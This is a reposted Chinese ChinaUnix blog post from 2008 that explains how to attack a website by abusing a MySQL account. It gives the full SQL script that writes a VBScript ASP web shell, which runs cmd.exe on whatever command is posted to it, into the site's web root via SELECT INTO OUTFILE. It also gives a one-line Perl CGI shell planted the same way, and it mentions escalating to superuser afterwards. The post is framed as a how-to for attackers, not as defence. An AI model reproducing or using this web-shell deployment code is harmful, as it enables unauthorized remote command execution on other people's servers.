利用mysql空密码进行攻击-sdccf-ChinaUnix博客

Fosdccf.blog.chinaunix.net

首页　| 　博文目录　| 　关于我

sdccf

博客访问： 104622897
博文数量： 19283
博客积分： 9968
博客等级：上将
技术积分： 196062
用户组：普通用户
注册时间： 2007-02-07 14:28

文章分类

全部博文（19283）

香文化（0）
CU技术专题（2443）

Linux酷软（214）

tmp（0）

PostgreSQL（93）

Solaris（383）

AIX（173）

SCOUNIX（575）

DB2（1005）
涂鸦（9）
编程开发（1573）

Shell（386）

C/C++（1187）
数据库（6458）

MySQL（1750）

Sybase（465）

Oracle（3695）

Informix（548）
操作系统（8627）

HP-UX（0）

IBM AIX（2）

Sun Solaris（0）

BSD（1）

Linux（8597）

SCO UNIX（23）
未分配的博文（173）

文章存档

2011年（1）

2009年（125）

2008年（19094）

2007年（63）

我的朋友

相关博文

利用mysql空密码进行攻击

分类： Mysql/postgreSQL

2008-03-26 14:21:19

来源：赛迪网技术社区作者：ameinge

一天,突然得到一网站的mysql的账号,并查到它的主页所在位置为c:\www\www,首先在网上下载一个cmd.asp程序,然后写一个cmd.sql程序以便进行连接,把cmd.asp上传至它的目录,cmd.sql内容如下:

use test; 
create table tmp(cmd TEXT); 
insert into tmp values("<%@ Language=VBScript %>"); 
insert into tmp values("<%"); 
insert into tmp values("Dim oScript"); 
insert into tmp values("Dim oScriptNet"); 
insert into tmp values("Dim oFileSys, oFile"); 
insert into tmp values("Dim szCMD, szTempFile"); 
insert into tmp values("On Error Resume Next"); 
insert into tmp values("' -- create the COM objects that we will be using -- '"); 
insert into tmp values('Set oScript = Server.CreateObject("WSCRIPT.SHELL")'); 
insert into tmp values('Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")'); 
insert into tmp values('Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")'); 
insert into tmp values("' -- check for a command that we have posted -- '"); 
insert into tmp values('szCMD = Request.Form(".CMD")'); 
insert into tmp values('If (szCMD <> "") Then'); 
insert into tmp values("' -- Use a poor mans pipe ... a temp file -- '"); 
insert into tmp values('szTempFile = "C:\" & oFileSys.GetTempName( )'); 
insert into tmp values('Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)'); 
insert into tmp values('Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)'); 
insert into tmp values("End If"); 
insert into tmp values("%>"); 
insert into tmp values(""); 
insert into tmp values(""); 
insert into tmp values('" method="POST">'); 
insert into tmp values(''); 
insert into tmp values(''); 
insert into tmp values(""); 
insert into tmp values(""); 
insert into tmp values('<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>'); 
insert into tmp values("
"); 
insert into tmp values("<%"); 
insert into tmp values("If (IsObject(oFile)) Then"); 
insert into tmp values("' -- Read the output from our command and remove the temp file -- '"); 
insert into tmp values("On Error Resume Next"); 
insert into tmp values("Response.Write Server.HTMLEncode(oFile.ReadAll)"); 
insert into tmp values("oFile.Close"); 
insert into tmp values("Call oFileSys.DeleteFile(szTempFile, True)"); 
insert into tmp values("End If"); 
insert into tmp values("%>"); 
insert into tmp values("
"); 
insert into tmp values(""); 
select * from tmp into outfile "c:\\www\\www\\234.asp"; 
drop table tmp;

在用insert into往表里添加内容时，不能只用一个insert into将内容全部添加进去，要一行一行的加，不然就会出现错误，所以每一行都得有一个insert into.

然后进行连接:

c:\mysql\bin\mysql -u user -p password -h ip

如果变为:

c:\mysql\bin\

则表明建立asp文件成功!然后:

http:\\

便可以得到一个普通用户的shell了!第一步成功了，成为超级用户也不会是难事吧!

如果通过mysql上传CGI文件的话就不用那么长篇了,

cmd.sql: 
use test; 
create table tmp(cmd TEXT); 
insert into tmp values('system @ARGV'); 
select * from tmp into outfile "c:\\www\\www\\234.cgi"; 
drop table tmp;

然后就可以通过http:\\ c:\了,同样也得到了一个普通用户的shell了

阅读(614) | 评论(0) | 转发(0) |

上一篇：解决MySQL启动时万恶的1067错误

下一篇：MySQL安装的安全性

给主人留下些什么吧！~~

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6